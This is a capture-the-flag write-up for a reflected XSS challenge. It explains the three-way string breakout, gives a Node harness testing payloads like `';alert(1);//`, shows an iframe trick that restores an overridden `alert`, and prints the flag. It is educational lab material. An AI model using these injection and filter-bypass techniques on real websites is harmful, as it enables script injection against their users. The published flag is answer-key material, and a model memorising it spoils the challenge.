Tags: xss

Rating: 0

**Description**

> This is some kind of reverse captcha to tell if the visitor is indeed a robot. Can you complete it?
>
> Service: http://xss1.alieni.se:2999/

**No files given**

**Solution**

We are presented with a simple challenge:

![](https://raw.githubusercontent.com/Aurel300/empirectf/master/writeups/2018-05-31-SecurityFest/screens/excesss.png)

If we follow the `?xss=hello` link, we can see this in the source code:

```html
<script>var x ='hello'; var y = hello; var z = "hello";</script>
```

The `xss` parameter is reflected verbatim into three JavaScript contexts inside the same script: a single-quoted string, a bare expression, and a double-quoted string. None of our characters are filtered, so any of the three can serve as the breakout point, as long as the whole line still parses afterwards (all three reflections sit in one `<script>` block, so a single syntax error stops all of it from running). Choosing the first context, we inject a `'` to close the string, then a `;` to end the statement so we can run arbitrary code, and after our code we put `//` to comment out the rest of the line (otherwise the original closing quote and the other two reflections would leave the browser with a syntax error and nothing would execute).
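To check which breakout payloads actually leave the script parseable, here is an added example that is not part of the original writeup: the template is reconstructed from the script shown above, the candidate payloads and the `alert(1)` sink are my own choices, and the URL builder assumes the challenge reads `xss` from a plain GET query string. It compiles the reflected script with `new Function` (which parses without executing), so it runs offline in Node and shows that the "close the quote, add `//`" trick works for the single-quoted and bare contexts but not for the double-quoted one, where the quote has to be re-closed instead.

```javascript
// Reconstruction of the vulnerable template: the xss parameter is reflected
// verbatim into three JavaScript contexts in one <script> block.
function renderScript(xss) {
  return `var x ='${xss}'; var y = ${xss}; var z = "${xss}";`;
}

// Compile (without executing) the script the browser would receive. Because
// all three reflections share one script, a payload must leave the whole
// line syntactically valid or nothing in the block runs.
function parses(xss) {
  try {
    new Function(renderScript(xss));
    return true;
  } catch (e) {
    if (e instanceof SyntaxError) return false;
    throw e; // anything else is a bug in this harness, not a parse failure
  }
}

// Candidate payloads, one per context (constructed; alert(1) is the sink).
const candidates = {
  "single-quoted string": "';alert(1);//",
  "bare expression": "0;alert(1);//",
  // Line comment after breaking out of the double-quoted string: the `//`
  // is swallowed by the string that opens at `var y = "`, leaving two
  // adjacent string literals, which is a syntax error.
  "double-quoted, line comment": '";alert(1);//',
  // Re-closing the quote instead keeps every context balanced.
  "double-quoted, re-closed": '";alert(1);"',
};

// Returns only the candidates whose rendered script parses.
function workingPayloads() {
  return Object.fromEntries(
    Object.entries(candidates).filter(([, payload]) => parses(payload))
  );
}

// Build the challenge URL; URLSearchParams percent-encodes the payload so
// characters like ';' and '#' survive the trip through the query string.
function buildUrl(base, xss) {
  const u = new URL(base);
  u.searchParams.set("xss", xss);
  return u.toString();
}

// Usage:
//   workingPayloads()  -> the three payloads that parse
//   buildUrl("http://xss1.alieni.se:2999/", "';alert(1);//")
```

Run it with `node` and call `workingPayloads()`; three of the four candidates survive. The harness only checks syntax, which is the failure mode that matters here: a payload that breaks the parse is silently dead, whereas a runtime error in the untouched parts of the line (such as `hello` being undefined) happens after our injected code has already run.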

URL:

But if we do this, we get a text prompt instead of an alert box. There is another script included on the website which overrides `window.alert`. Unfortunately there is no prototype to fall back on: in Chrome (at least the current version) `alert` lives directly on the `window` object rather than on `Window.prototype`, so the override replaces the only copy. Trying `delete window.alert;` merely removes the property; the default alert function does not get restored.

Searching around for how to restore overridden native functions, we find a simple technique: create an `<iframe>` and use the `alert` of its window. The frame is a fresh browsing context with its own `window` object, which the overriding script never touched.

```javascript
var iframe = document.createElement("iframe");
document.documentElement.appendChild(iframe);
// The frame's window carries its own, unmodified native alert.
iframe.contentWindow.alert(1);
```

With the native `alert` restored, we get the flag: `sctf{cr0ss_s1te_n0scr1ptinG}`